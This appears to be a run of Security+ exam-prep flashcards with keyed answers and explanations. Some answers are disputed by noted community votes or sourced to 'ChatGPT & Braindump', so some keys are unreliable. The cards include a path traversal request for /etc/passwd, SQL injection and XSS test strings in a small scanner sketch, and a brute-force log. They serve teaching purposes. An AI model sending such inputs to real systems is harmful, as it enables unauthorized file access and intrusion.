c. Script kiddies: Script kiddies are individuals who use existing tools and scripts to launch attacks without deep technical knowledge. They are generally not sophisticated enough to orchestrate a breach of this scale or purpose.

d. Advanced persistent threats (APTs): APTs are typically sophisticated threat actors that maintain long-term access to a target network or system for espionage or data exfiltration. While they can be state-sponsored, the scenario does not explicitly describe ongoing persistence but rather a breach and immediate public dissemination.

Therefore, b. State actors best describes the threat actors involved in breaching a major political party’s server and leaking sensitive communications for political advantage.

21
Q

A company is required to continue using legacy software to support a critical service. Which of the following BEST explains a risk of this practice?

a. Default system configuration
b. Unsecure protocols
c. Lack of vendor support
d. Weak encryption

A

c. Lack of vendor support

Explanation:

Legacy software often ceases to receive vendor support over time, which means the vendor no longer provides updates, security patches, or technical assistance. This lack of support leaves the software vulnerable to newly discovered vulnerabilities and exploits.

Why the Other Options are Not Appropriate:

a. Default system configuration: While legacy software may retain default configurations, the primary risk lies in the absence of security updates rather than the configuration itself.

b. Unsecure protocols: This could be a concern with legacy software, but it's not the most direct risk associated with continuing to use it. The lack of vendor support poses a more immediate threat.

d. Weak encryption: This could also be a concern depending on the software, but again, it's not the most direct risk posed by lack of vendor support.

Therefore, c. Lack of vendor support is the best explanation because it directly addresses the risk of not receiving necessary updates and patches to secure the software against evolving threats.

22
Q

A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment. Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following BEST describes the type of assessment taking place?

a. Input validation
b. Dynamic code analysis
c. Fuzzing
d. Manual code review

A

b. Dynamic code analysis

Explanation:

Dynamic code analysis, also known as dynamic application security testing (DAST), involves assessing applications in a runtime environment to identify vulnerabilities and security issues. This process typically involves interacting with the running application to simulate how an attacker might exploit it. It focuses on identifying weaknesses that could be exploited while the application is running.

Why the Other Options are Not Appropriate:

a. Input validation: This term refers to a specific aspect of security testing related to ensuring that input data is correctly handled and validated by the application, which is different from the broader runtime assessment described.

c. Fuzzing: Fuzzing involves feeding invalid, unexpected, or random data as inputs to a software application to identify vulnerabilities. While related to dynamic analysis, it specifically focuses on input handling and fault tolerance testing.

d. Manual code review: This involves a manual inspection of the source code to identify potential security issues and bugs before deployment, which is not the same as assessing programs in a runtime environment.

Therefore, b. Dynamic code analysis aligns best with the scenario where runtime assessment is conducted to find critical issues in deployed programs.
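The essence of dynamic analysis is exercising the running program and observing its behavior. Below is a bare-bones sketch of that idea; the target URL and payloads are hypothetical, and a real DAST tool drives the application far more systematically:

import urllib.error
import urllib.parse
import urllib.request

TARGET = "http://localhost:8080/search?q="   # hypothetical running test instance
PAYLOADS = ["normal", "' OR '1'='1", "<script>alert(1)</script>"]

for payload in PAYLOADS:
    url = TARGET + urllib.parse.quote(payload)
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            print(payload, "->", resp.status)
    except urllib.error.HTTPError as e:
        print(payload, "->", e.code)  # 5xx here is a finding to send back to the developer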

23
Q

Which of the following can work as an authentication method and as an alerting mechanism for unauthorized access attempts?

a. Smart card
b. Push notifications
c. Attestation service
d. HMAC-based one-time password

A

b. Push notifications

Explanation:

Push notifications can serve a dual purpose in security:

Authentication Method: Push notifications are commonly used in two-factor authentication (2FA) setups where a user receives a push notification on their registered device (like a smartphone) to approve or deny access to an application or service.

Alerting Mechanism: Push notifications can also serve as an alerting mechanism for unauthorized access attempts. If an unauthorized attempt is made and triggers a push notification (even if the user doesn't approve it), it can alert the user and possibly security operations about the attempted access.

Why the Other Options are Not as Suitable:

a. Smart card: While smart cards provide authentication, they do not typically function as alerting mechanisms for unauthorized access attempts.

c. Attestation service: Attestation services verify the integrity and authenticity of software and hardware components but are not directly involved in user authentication or unauthorized access alerting.

d. HMAC-based one-time password (HOTP): HOTPs are used for authentication but do not directly serve as an alerting mechanism for unauthorized access attempts.

Therefore, b. Push notifications is the most appropriate choice as it integrates authentication with the ability to alert users and administrators about potential unauthorized access attempts in real-time.

24
Q

A company has a flat network in the cloud. The company needs to implement a solution to segment its production and non-production servers without migrating servers to a new network. Which of the following solutions should the company implement?

a. Intranet
b. Screened subnet
c. VLAN segmentation
d. Zero Trust

A

c. VLAN segmentation

Explanation:

VLAN segmentation allows you to logically divide a single physical network into multiple virtual networks (VLANs). Each VLAN operates as a separate broadcast domain, enabling you to isolate traffic between different segments. This segmentation can be achieved without physically restructuring the network, making it ideal for cloud environments where servers are often provisioned within a single network segment.

Intranet: An intranet is a private network within an organization, typically accessed via a VPN or similar secure connection, but it doesn't provide segmentation within a single network.

Screened subnet: This involves placing a firewall between two networks to control traffic, which may not be directly applicable to a cloud environment without additional complexity.

Zero Trust: Zero Trust is a security model that assumes all access attempts are potentially malicious and verifies each request as though it originates from an open network, but it's a broader strategy rather than a specific segmentation solution.

Therefore, VLAN segmentation is the most practical solution for segmenting production and non-production servers within a flat network in the cloud, allowing for isolation of traffic and enhanced security without the need for physical network restructuring.

25
Q

The president of a regional bank likes to frequently provide SOC tours to potential investors. Which of the following policies BEST reduces the risk of malicious activity occurring after a tour?

a. Password complexity
b. Acceptable use
c. Access control
d. Clean desk

A

(Community D 70%, C 30%)
d. Clean desk

Here’s why:

Clean Desk Policy: This policy ensures that sensitive information, documents, and equipment are not left unattended or visible when not in use. It minimizes the risk of visitors or unauthorized individuals accessing or capturing confidential information during SOC tours. By keeping workspaces clear of unnecessary items, especially when tours are being conducted, the chances of accidental exposure or intentional data theft are significantly reduced.

Let’s briefly review the other options:

Password complexity: While important for securing access to systems, this policy does not directly address the physical security risks associated with tours of the SOC.

Acceptable use: This policy governs the appropriate use of organizational resources by employees. While crucial, it does not specifically mitigate the risks associated with physical tours of the SOC.

Access control: Access control policies are essential for managing who can enter and interact with various systems and areas. However, this option does not directly address the issue of securing physical spaces and preventing unauthorized access to sensitive information during tours.

Therefore, implementing a Clean Desk Policy is the most effective measure to mitigate the risk of malicious activity following SOC tours by ensuring that sensitive information is not exposed to visitors.

26
Q

A Chief Information Security Officer has defined resiliency requirements for a new data center architecture. The requirements are as follows:

-Critical fileshares will remain accessible during and after a natural disaster.
-Five percent of hard disks can fail at any given time without impacting the data.
-Systems will be forced to shut down gracefully when battery levels are below 20%.

Which of the following are required to BEST meet these objectives? (Choose three.)

a. Fiber switching
b. IaC
c. NAS
d. RAID
e. UPS
f. Redundant power supplies
g. Geographic dispersal
h. Snapshots
i. Load balancing

A

(Community DEG 79%)

d. RAID
e. UPS
g. Geographic dispersal

Here’s why:

RAID (Redundant Array of Independent Disks): This meets the requirement of allowing up to five percent of hard disks to fail without impacting the data. RAID configurations provide disk redundancy and fault tolerance.

UPS (Uninterruptible Power Supply): This ensures that systems will be forced to shut down gracefully when battery levels are below 20%. A UPS provides backup power and can manage safe shutdowns during power outages.

Geographic dispersal: This ensures that critical fileshares will remain accessible during and after a natural disaster. By distributing data centers geographically, the risk of a single natural disaster affecting all data centers is minimized, enhancing availability and disaster recovery capabilities.

The other options are beneficial for overall infrastructure but do not directly address the specific resiliency requirements outlined:

Fiber switching: Improves network performance and redundancy but does not directly relate to the specified requirements.
IaC (Infrastructure as Code): Enhances deployment and management efficiency but does not directly address the specific resiliency requirements.
NAS (Network Attached Storage): Provides centralized storage but does not inherently offer the resiliency required.
Redundant power supplies: Improve power redundancy but do not specifically ensure a graceful shutdown or data accessibility during a disaster.
Snapshots: Provide data backups but do not ensure continuous availability during a disaster.
Load balancing: Distributes workloads but does not directly address the specified resiliency requirements.
27
Q

Which of the following is a security best practice that ensures the integrity of aggregated log files within a SIEM?

a. Set up hashing on the source log file servers that complies with local regulatory requirements.
b. Back up the aggregated log files at least two times a day or as stated by local regulatory requirements.
c. Write protect the aggregated log files and move them to an isolated server with limited access.
d. Back up the source log files and archive them for at least six years or in accordance with local regulatory requirements.

A

(Community : A 52%, C 48%)
c. Write protect the aggregated log files and move them to an isolated server with limited access.

The question asks about the integrity of the aggregated logs, while answer choice a only hashes the source logs. More fundamentally, hashing alone does not ensure integrity: it can detect whether a piece of data has been altered, but it cannot prevent the alteration. Ensuring integrity calls for a preventive control, such as storing the logs on a write-protected, isolated server.

Here’s a breakdown of why option C is the best choice for ensuring the integrity of aggregated log files within a Security Information and Event Management (SIEM) system:

Write Protection: This prevents any modifications to the log files after they are created. Once logs are written, protecting them from changes ensures that the data remains trustworthy and tamper-proof.
Isolated Server with Limited Access: By storing the logs on an isolated server, you reduce the risk of unauthorized access and potential tampering. Limited access control ensures that only designated personnel can interact with the logs, further securing the integrity of the data.


Here’s why other options are less suitable:

Set up hashing on the source log file servers: While hashing can help verify integrity, it does not prevent tampering. If an attacker can modify the log files, they might also be able to update the hashes.

Back up the aggregated log files: While backups are important for recovery, they do not ensure integrity on their own. If the log files are tampered with before backup, the backups will contain the tampered data.

Back up the source log files: This practice is related to data retention and recovery, not specifically to ensuring the integrity of aggregated logs within a SIEM.

Therefore, write protecting the aggregated log files and moving them to an isolated server with limited access is the most effective practice for maintaining the integrity of log files within a SIEM system.
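To see why hashing is detective rather than preventive, consider this short sketch: the digest reveals a modification after the fact, but only write protection stops the modification from happening:

import hashlib

def sha256_of(path: str) -> str:
    """Compute a digest used later to *detect* tampering with a log file."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

baseline = sha256_of("aggregated.log")  # assumed aggregated log file
# ... later, when auditing the archived copy on the isolated server ...
assert sha256_of("aggregated.log") == baseline, "log file was modified"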

28
Q

A security analyst is evaluating the risks of authorizing multiple security solutions to collect data from the company’s cloud environment. Which of the following is an immediate consequence of these integrations?

a. Non-compliance with data sovereignty rules
b. Loss of the vendor's interoperability support
c. Mandatory deployment of a SIEM solution
d. Increase in the attack surface

A

d. Increase in the attack surface

Explanation:

Increase in the attack surface: Integrating multiple security solutions typically involves installing additional agents, connectors, or APIs to gather data from various cloud services and resources. Each integration introduces potential vulnerabilities that attackers could exploit. These vulnerabilities may arise from misconfigurations, insecure APIs, or weaknesses in the security solutions themselves. Therefore, the more integrations and agents are deployed, the broader the attack surface becomes, increasing the potential avenues for attackers to target and compromise the organization's cloud environment.

Let’s briefly discuss why the other options are not immediate consequences in this context:

Option a: Non-compliance with data sovereignty rules could occur if data is processed or stored in a manner that violates regulatory requirements, but this is not necessarily an immediate consequence of integrating security solutions.

Option b: Loss of vendor interoperability support could be a risk in the long term if vendors do not support the integration or if compatibility issues arise, but it is not an immediate consequence of integration.

Option c: Mandatory deployment of a SIEM solution may be a strategic decision to centralize and analyze security logs, but it is not an immediate consequence of integrating multiple security solutions.

Therefore, option d, an increase in the attack surface, is the most relevant and immediate consequence to consider when authorizing multiple security solutions to collect data from a company’s cloud environment.

29
Q

Which of the following explains why RTO is included in a BIA?

a. It identifies the amount of allowable downtime for an application or system.
b. It prioritizes risks so the organization can allocate resources appropriately.
c. It monetizes the loss of an asset and determines a break-even point for risk mitigation.
d. It informs the backup approach so that the organization can recover data to a known time.

A

a. It identifies the amount of allowable downtime for an application or system.

Explanation:

RTO (Recovery Time Objective) is a critical metric defined in a Business Impact Analysis (BIA) to determine the maximum acceptable downtime for a business process, application, or system. It helps in setting expectations regarding how quickly a system or process needs to be restored after a disruption or disaster.

Business Impact Analysis (BIA) is a process used to evaluate the potential effects of an interruption to critical business operations. It helps organizations prioritize their recovery efforts and allocate resources effectively based on the impact of various scenarios.

Option a correctly explains that RTO is included in a BIA because it specifies the allowable downtime, which is crucial for prioritizing recovery efforts and ensuring that the organization can resume operations within acceptable limits after a disruption.

Let’s briefly review why the other options are incorrect:

Option b: Prioritizing risks and allocating resources appropriately is more closely related to Risk Assessment and Management, not specifically to why RTO is included in a BIA.

Option c: Monetizing the loss of an asset and determining a break-even point is more aligned with Cost-Benefit Analysis and Financial Risk Assessment, not directly with the purpose of RTO in a BIA.

Option d: Informing the backup approach to recover data to a known time is related to Backup and Recovery Planning, but it does not specifically address why RTO is included in a BIA.

Therefore, the correct and most relevant explanation for why RTO is included in a BIA is to identify the allowable downtime for an application or system (option a).

30
Q

A security analyst is reviewing web-application logs and finds the following log:

https://www.comptia.org/contact-us/%3Ffile%3D..%2F..%2F..%2Fetc%2Fpasswd

Which of the following attacks is being observed?

a. Directory traversal
b. XSS
c. CSRF
d. On-path attack

A

a. Directory traversal

Explanation:

Directory traversal (also known as path traversal) is a web security vulnerability that allows an attacker to access files and directories that are stored outside the web root folder. In the provided log entry:

https://www.comptia.org/contact-us/%3Ffile%3D..%2F..%2F..%Fetc%2Fpasswd

%3F is the URL encoding of ? and %3D is the URL encoding of =.
%2F is the URL encoding of /, so each ..%2F sequence decodes to ../, a step up one directory level.
The stray %F before etc appears to be a malformed or truncated %2F; broken encodings like this are common in attack traffic and are sometimes used deliberately to slip past naive input filters.

The repeated ..%2F sequences in the URL indicate an attempt to climb multiple directory levels out of the web root, ultimately targeting sensitive system files such as /etc/passwd.
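
To see the traversal plainly, the request can be URL-decoded. A minimal Python sketch (the URL is copied from the log entry above; note how the malformed %F survives decoding as an invalid byte):

from urllib.parse import unquote

# Request line exactly as it appears in the log (note the malformed %F before "etc")
logged = "https://www.comptia.org/contact-us/%3Ffile%3D..%2F..%2F..%Fetc%2Fpasswd"

print(unquote(logged))
# -> https://www.comptia.org/contact-us/?file=../../..�tc/passwd
# %3F -> ?, %3D -> =, %2F -> /; "%Fe" is consumed as the single byte 0xFE,
# which is not valid UTF-8, so unquote() renders it as the replacement character.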

XSS (Cross-Site Scripting) involves injecting malicious scripts into web pages viewed by other users.

CSRF (Cross-Site Request Forgery) involves tricking a user into unknowingly executing actions on a web application.

On-path attack typically involves intercepting or manipulating traffic between a user and a web application.

31
Q

A security analyst is reviewing the vulnerability scan report for a web server following an incident. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?

a. Security patches were uninstalled due to user impact.
b. An adversary altered the vulnerability scan reports.
c. A zero-day vulnerability was used to exploit the web server.
d. The scan reported a false negative for the vulnerability.

A

a. Security patches were uninstalled due to user impact.

Here’s why this is the most likely cause:

Uninstalled Security Patches: It is common for organizations to uninstall or roll back security patches if they cause unexpected issues or user impact, such as application failures or performance degradation. This action could leave the system vulnerable to known exploits, even though patches were previously available and possibly installed at one point.

Historical Scan Reports: The presence of the vulnerability in historical vulnerability scan reports suggests that at some point, the vulnerability was detected and possibly patched. If patches were later uninstalled, either intentionally or unintentionally, the vulnerability would reappear and potentially be exploitable.

User Impact Concerns: Security patches sometimes introduce compatibility issues or unexpected behavior in applications. In response to these issues, administrators may decide to uninstall or delay applying patches until they can be tested further or until an alternative solution is found. This decision, however, leaves the system exposed to known vulnerabilities.

The other options are less likely based on the information given:

b. Adversary altering scan reports: This is less likely unless there is evidence of compromise affecting the integrity of scan reports, which is not provided in the scenario.

c. Zero-day vulnerability: If it were a zero-day vulnerability, it would not be present in historical scan reports, as these vulnerabilities are unknown to the public and security vendors until they are exploited.

d. False negative in scan reports: While possible, the historical reports showing the vulnerability before the incident suggest it was previously detected, which makes a false negative less likely.

Therefore, considering the scenario and the details provided, a. Security patches were uninstalled due to user impact is the most plausible cause for the vulnerability being present and exploitable on the web server.

32
Q

Which of the following is a known security risk associated with data archives that contain financial information?

a. Data can become a liability if archived longer than required by regulatory guidance.
b. Data must be archived off-site to avoid breaches and meet business requirements.
c. Companies are prohibited from providing archived data to e-discovery requests.
d. Unencrypted archives should be preserved as long as possible and encrypted.

A

a. Data can become a liability if archived longer than required by regulatory guidance.

Explanation:

Data archives that contain financial information pose several security risks, and among them, the most significant is the risk associated with regulatory compliance and retention requirements. Here’s why each option is correct or incorrect:

Option a: Data can become a liability if archived longer than required by regulatory guidance.
    This is a known security risk because regulatory frameworks often dictate specific retention periods for financial data. Keeping data longer than necessary can lead to legal and compliance issues, as well as increased exposure to data breaches and misuse.

Option b: Data must be archived off-site to avoid breaches and meet business requirements.
    While off-site storage is a common practice for disaster recovery and business continuity, it primarily addresses availability concerns rather than security risks associated with retention periods or compliance.

Option c: Companies are prohibited from providing archived data to e-discovery requests.
    This statement is incorrect because archived data is often subject to e-discovery requests as part of legal proceedings. However, the manner in which data is archived and the compliance with legal hold requirements are critical factors in responding to such requests.

Option d: Unencrypted archives should be preserved as long as possible and encrypted.
    This statement is incorrect because unencrypted archives pose significant security risks, especially for financial information. Archives should be encrypted to protect sensitive data from unauthorized access and breaches.

Therefore, option a is the best answer as it directly addresses the security risk associated with regulatory compliance and the potential liability of retaining financial data longer than necessary.

33
Q

Which of the following BEST describes the process of documenting who has access to evidence?

a. Order of volatility
b. Chain of custody
c. Non-repudiation
d. Admissibility

A

b. Chain of custody

Explanation:

Chain of custody refers to the documentation and procedures used to establish the history of an item of evidence. It tracks the movement and handling of evidence from the moment it is collected until it is presented in court or used in an investigation. This process ensures that the integrity of the evidence is maintained and can be verified, including who has accessed it and when.

Let’s briefly explain why the other options are not correct:

Order of volatility (a): This refers to the principle of preserving evidence in a sequence that captures volatile data first, such as RAM, which is more transient compared to persistent storage. It does not directly address documenting who has access to evidence.

Non-repudiation (c): This refers to the ability to prove that a specific party took a particular action and cannot deny having done so. It applies more to actions such as digital signatures and transactions, rather than to the documentation of physical or digital evidence access.

Admissibility (d): This refers to whether evidence is considered acceptable and valid in a court of law based on legal standards. It involves ensuring that evidence collection and handling procedures, including chain of custody, have been followed correctly, but it doesn't specifically address documenting who has access to evidence.

Therefore, chain of custody (b) is the process that specifically involves documenting and maintaining records of who has access to evidence throughout its handling and storage.

34
Q

A systems engineer wants to leverage a cloud-based architecture with low latency between network-connected devices that also reduces the bandwidth that is required by performing analytics directly on the endpoints. Which of the following would BEST meet the requirements? (Choose two.)

a. Private cloud
b. SaaS
c. Hybrid cloud
d. IaaS
e. DRaaS
f. Fog computing

A

(Community CF 66%, AF 28%)
c. Hybrid cloud
f. Fog computing

“Many people use the terms fog computing and edge computing interchangeably because both involve bringing intelligence and processing closer to where the data is created” - https://www.techtarget.com/iotagenda/definition/fog-computing-fogging

While a private cloud can provide security and control, it may not be as suitable for “low-latency” requirements in scenarios involving network-connected devices.

Hybrid cloud environments can also incorporate edge computing, which processes data closer to the source (devices) to reduce latency and improve performance.

(ChatGPT & Braindump)
c. Hybrid cloud
f. Fog computing
Explanation:

Hybrid cloud (c): A hybrid cloud architecture allows for the integration of private and public cloud services, providing flexibility to perform analytics closer to the endpoints (on-premises or in private cloud) while leveraging the scalability and resources of public cloud services for other tasks.

Fog computing (f): Fog computing extends cloud computing to the edge of the network, closer to devices and endpoints. It enables data processing and analytics to be performed locally on edge devices or in nearby servers, reducing latency and conserving bandwidth by minimizing the need to transmit raw data to distant cloud data centers.

Why the other options are not the best choices:

Private cloud (a): A private cloud typically does not address the need for low latency and bandwidth reduction directly between network-connected devices or endpoints. It focuses more on providing dedicated resources within a controlled environment.

SaaS (b): Software as a Service (SaaS) delivers software applications over the internet, but it does not inherently address the low latency and analytics requirements at the network level or endpoint level.

IaaS (d): Infrastructure as a Service (IaaS) provides virtualized computing resources over the internet, such as virtual machines and storage, but it does not specifically address the low latency and analytics requirements at the endpoint level.

DRaaS (e): Disaster Recovery as a Service (DRaaS) focuses on providing backup and recovery solutions, which is different from the requirements of low latency and endpoint analytics.

Therefore, hybrid cloud (c) and fog computing (f) are the most suitable options for meeting the specified requirements.

35
Q

Which of the following is a policy that provides a greater depth and breadth of knowledge across an organization?

a. Asset management policy
b. Separation of duties policy
c. Acceptable use policy
d. Job rotation policy

A

d. Job rotation policy

Here’s why:

Job Rotation Policy: This policy involves periodically moving employees between different jobs or roles within the organization. It helps employees gain a broader understanding of various functions, processes, and responsibilities across the organization. This not only enhances individual skill sets but also fosters a more versatile and knowledgeable workforce, which can improve overall organizational resilience and capability.

The other options, while important, do not specifically aim to increase the depth and breadth of knowledge across the organization:

Asset management policy: Focuses on the management of the organization's assets, ensuring they are properly tracked, maintained, and utilized. It does not directly contribute to increasing employee knowledge across different areas.

Separation of duties policy: Aims to reduce the risk of fraud and errors by ensuring that no single individual has control over all aspects of any critical process. While it enhances security and accountability, it does not necessarily promote broader knowledge among employees.

Acceptable use policy: Outlines the proper use of organizational resources and systems by employees. It helps ensure security and appropriate behavior but does not directly contribute to increasing knowledge across different areas of the organization.

36
Q

A company is moving its retail website to a public cloud provider. The company wants to tokenize credit card data but not allow the cloud provider to see the stored credit card information. Which of the following would BEST meet these objectives?

a. WAF
b. CASB
c. VPN
d. TLS

A

b. CASB (Cloud Access Security Broker)

Here’s why CASB is the most suitable choice:

Tokenization Capability: CASB solutions can integrate with cloud environments to provide tokenization services. Tokenization replaces sensitive data (such as credit card numbers) with unique identification symbols (tokens) that retain essential information without exposing the actual data (a minimal sketch of this idea follows the list below).

Control Over Data Access: CASBs offer granular control over data access and visibility in cloud environments. This includes policies that can restrict or monitor access to sensitive data, ensuring that the cloud provider does not have visibility into the original credit card information.

Compliance and Security: CASBs are designed to enforce security policies across cloud services, ensuring compliance with regulatory requirements (such as PCI DSS for handling credit card information). This helps in maintaining data privacy and security while using cloud services.
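
Here is that minimal sketch of the tokenization idea. The vault, token format, and function names are invented for illustration; in a real CASB deployment, tokenization is a managed service sitting between users and the cloud application, not a few lines of code:

import secrets

_vault = {}  # token -> real value; in practice an encrypted store kept on-premises

def tokenize(card_number: str) -> str:
    # Generate an opaque token; only the token is ever sent to the cloud provider
    token = "tok_" + secrets.token_hex(8)
    _vault[token] = card_number
    return token

def detokenize(token: str) -> str:
    # Reversal is only possible where the vault lives (on-premises / CASB side)
    return _vault[token]

token = tokenize("4111111111111111")
print(token)              # e.g. tok_9f2c4e1ab87d03e5 -- what the cloud provider stores
print(detokenize(token))  # the original number, recoverable only through the vault

The essential property is that the token-to-card-number mapping exists only in the vault, so records stored with the cloud provider are meaningless on their own.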

In contrast, the other options:

WAF (Web Application Firewall): While important for web application security, WAF primarily focuses on filtering and monitoring HTTP traffic to and from a web application. It does not directly address the tokenization or data visibility requirements mentioned.

VPN (Virtual Private Network): VPNs are used to create secure, encrypted connections over a less secure network (like the internet). While they provide secure communication channels, they do not inherently tokenize data or control data visibility within a cloud environment.

TLS (Transport Layer Security): TLS provides encryption for data in transit between clients and servers. While essential for securing data in transit, it does not address tokenization or control data visibility within cloud storage.

Therefore, CASB is the best option as it directly addresses the requirement to tokenize credit card data while ensuring the cloud provider does not have visibility into the sensitive information stored in the cloud environment.

37
Q

A security analyst is tasked with defining the “something you are” factor of the company’s MFA settings. Which of the following is BEST to use to complete the configuration?

a. Gait analysis
b. Vein
c. Soft token
d. HMAC-based, one-time password

A

b. Vein

Here’s why vein is the best choice:

Biometric Authentication: Vein recognition is a form of biometric authentication that identifies individuals based on the patterns of veins in their hands or fingers. It is a highly secure method because vein patterns are unique to each individual and difficult to replicate or steal compared to other biometric features like fingerprints.

Accuracy and Reliability: Vein recognition technology is known for its high accuracy and reliability. It is less susceptible to spoofing or false positives compared to other biometric methods like facial recognition or voice recognition.

Non-intrusive: Unlike gait analysis, which requires observing and analyzing how a person walks, vein recognition can be done discreetly using near-infrared light to capture vein patterns beneath the skin's surface. This makes it a more practical and user-friendly choice for MFA implementations.

Compliance and Security: Vein recognition meets stringent security requirements for MFA, especially in environments where high levels of security are necessary, such as accessing sensitive systems or data.

In contrast:

Gait analysis involves analyzing the way a person walks to identify them, which is more complex to implement and may not be as widely supported or accurate as vein recognition.

Soft token and HMAC-based one-time password (OTP) are typically used as the "something you have" factor in MFA, where soft tokens generate OTPs and HMAC-based OTPs are cryptographic tokens generated by hardware or software.

Therefore, based on the requirement to define the “something you are” factor for MFA, b. Vein recognition offers a robust and secure biometric authentication method suitable for this purpose.

38
Q

Which of the following processes will eliminate data using a method that will allow the storage device to be reused after the process is complete?

a. Pulverizing
b. Overwriting
c. Shredding
d. Degaussing

A

b. Overwriting

Overwriting is a process where data on a storage device (such as a hard drive or solid-state drive) is replaced with new data multiple times, effectively erasing the original data. This method allows the storage device to be reused afterward because the existing data is no longer recoverable. Overwriting typically involves writing random patterns of data over the entire storage area multiple times to ensure that the previous data cannot be reconstructed.
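
Purely as an illustration (not a substitute for certified sanitization tooling, and note that wear-leveling on SSDs can leave remnants a simple overwrite never touches), a single overwrite pass in Python might look like this; the file path is hypothetical:

import os

path = "/tmp/old-data.bin"  # hypothetical file to sanitize
size = os.path.getsize(path)
chunk = 1024 * 1024  # write in 1 MiB chunks to bound memory use

# One pass of random data; sanitization standards often call for multiple passes
with open(path, "r+b") as f:
    remaining = size
    while remaining > 0:
        n = min(chunk, remaining)
        f.write(os.urandom(n))
        remaining -= n
    f.flush()
    os.fsync(f.fileno())  # push the new bytes through OS buffers to the device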

Here’s a brief explanation of the other options:

Pulverizing: This involves physically destroying the storage device into small pieces or powder, rendering it unusable and ensuring that data cannot be recovered.

Shredding: Similar to pulverizing, shredding involves physically destroying the storage device, usually into small pieces or strips, to prevent data recovery.

Degaussing: This method uses a strong magnetic field to disrupt the magnetic domains on magnetic storage devices (such as hard drives or tapes), effectively erasing the data. However, it typically renders the storage device unusable for future data storage.

Therefore, while all methods can effectively eliminate data, overwriting specifically allows the storage device to be reused after the process, making it the correct choice for scenarios where the device needs to be repurposed or reused securely.

39
Q

A user’s account is constantly being locked out. Upon further review, a security analyst found the following in the SIEM:

Time Log Message
9:00:00 AM login: user password: aBG23TMV
9:00:01 AM login: user password: aBG33TMV
9:00:02 AM login: user password: aBG43TMV
9:00:03 AM login: user password: aBG53TMV

Which of the following describes what is occurring?

a. An attacker is utilizing a password-spraying attack against the account.
b. An attacker is utilizing a dictionary attack against the account.
c. An attacker is utilizing a brute-force attack against the account.
d. An attacker is utilizing a rainbow table attack against the account.

A

c. An attacker is utilizing a brute-force attack against the account.

Explanation:

The log shows one attempt per second against the same account, with the password changing by a single incrementing character each time (aBG23TMV, aBG33TMV, aBG43TMV, aBG53TMV). Systematically stepping through candidate values like this is characteristic of a brute-force attack. A dictionary attack would try whole words or known passwords, password spraying would try one password across many accounts, and a rainbow table attack works offline against stolen hashes rather than against the login interface.
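
A SIEM detection for this pattern is essentially a threshold on authentication attempts per account per time window. A toy sketch of that logic (the timestamps mirror the log above; the window and threshold values are arbitrary choices):

from collections import defaultdict
from datetime import datetime, timedelta

# (timestamp, account) pairs parsed from authentication logs -- format assumed
events = [
    (datetime(2021, 4, 6, 9, 0, 0), "user"),
    (datetime(2021, 4, 6, 9, 0, 1), "user"),
    (datetime(2021, 4, 6, 9, 0, 2), "user"),
    (datetime(2021, 4, 6, 9, 0, 3), "user"),
]

WINDOW = timedelta(seconds=10)
THRESHOLD = 3  # attempts within the window before alerting

attempts = defaultdict(list)
for ts, account in sorted(events):
    recent = [t for t in attempts[account] if ts - t <= WINDOW]
    recent.append(ts)
    attempts[account] = recent
    if len(recent) >= THRESHOLD:
        print(f"ALERT: possible brute force against '{account}' at {ts}")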

40
Q

A web server has been compromised due to a ransomware attack. Further investigation reveals the ransomware has been in the server for the past 72 hours. The systems administrator needs to get the services back up as soon as possible. Which of the following should the administrator use to restore services to a secure state?

a. The last incremental backup that was conducted 72 hours ago
b. The last known-good configuration
c. The last full backup that was conducted seven days ago
d. The baseline OS configuration

A

b. The last known-good configuration

(Community C 57%, B 22%, A 20%)
(Braindump : a. The last incremental backup that was conducted 72 hours ago)

ChatGPT
b. The last known-good configuration

Explanation:
a. The last incremental backup that was conducted 72 hours ago:

This backup might contain some data up to 72 hours ago, but it could potentially include encrypted files if the ransomware had already infiltrated the server at that time. It may not fully address the current compromised state.

b. The last known-good configuration:

This option involves restoring from a configuration backup that was known to be secure before the ransomware attack occurred. It can help in restoring the server to a state where the ransomware was not present.

c. The last full backup that was conducted seven days ago:

This backup is likely older and would result in data loss of up to seven days. It may not be ideal if frequent updates or transactions have occurred since the last backup.

d. The baseline OS configuration:

This involves restoring the server to its initial state or a standard configuration known to be secure. It ensures that all system settings are reverted to a secure state, potentially removing any residual effects of the ransomware.

Best Choice:

b. The last known-good configuration

Restoring from the last known-good configuration ensures that the server is reverted to a state before the ransomware infection. It provides a higher likelihood of removing the ransomware and restoring the server to a secure and operational state without the risk of reinfection from compromised backups or data.

Therefore, option b is the most appropriate choice to restore services to a secure state promptly after a ransomware attack.

41
Q

A network engineer created two subnets that will be used for production and development servers. Per security policy, production and development servers must each have a dedicated network that cannot communicate with one another directly. Which of the following should be deployed so that server administrators can access these devices?

a. VLANs
b. Internet proxy servers
c. NIDS
d. Jump servers

A

d. Jump servers

Here’s why this solution is appropriate:

Access Control: A jump server (also known as a bastion host) is a dedicated server that acts as a gateway for accessing other servers in separate security zones (in this case, production and development). It allows administrators to securely connect to servers in each subnet without allowing direct communication between the subnets.

Security Isolation: By using a bastion host, you enforce access controls and isolate the production and development environments. Administrators must authenticate themselves to the bastion host, which then manages access to servers in each subnet based on defined security policies.

Auditability: All administrative access can be logged and audited from the bastion host, providing a clear record of who accessed which servers and when, enhancing security and compliance.

Simplicity and Management: Managing access through a single entry point (bastion host) simplifies network security management compared to allowing direct connectivity between subnets, which can be more complex to secure and monitor.

Therefore, deploying a bastion host or jump server is the recommended approach to enable server administrators to access devices in both the production and development subnets while maintaining the required network isolation and security.

42
Q

A social media company based in North America is looking to expand into new global markets and needs to maintain compliance with international standards.
With which of the following is the company’s data protection officer MOST likely concerned?

a. NIST Framework
b. ISO 27001
c. GDPR
d. PCI-DSS

A

c. GDPR (General Data Protection Regulation).

Here’s why:

GDPR: This regulation is focused on protecting the personal data and privacy of individuals within the European Union (EU) and the European Economic Area (EEA). It applies to organizations outside the EU/EEA that offer goods or services to, or monitor the behavior of, EU/EEA data subjects. Since the company is expanding globally, including into regions covered by GDPR, compliance with its stringent requirements regarding data privacy and security is crucial.

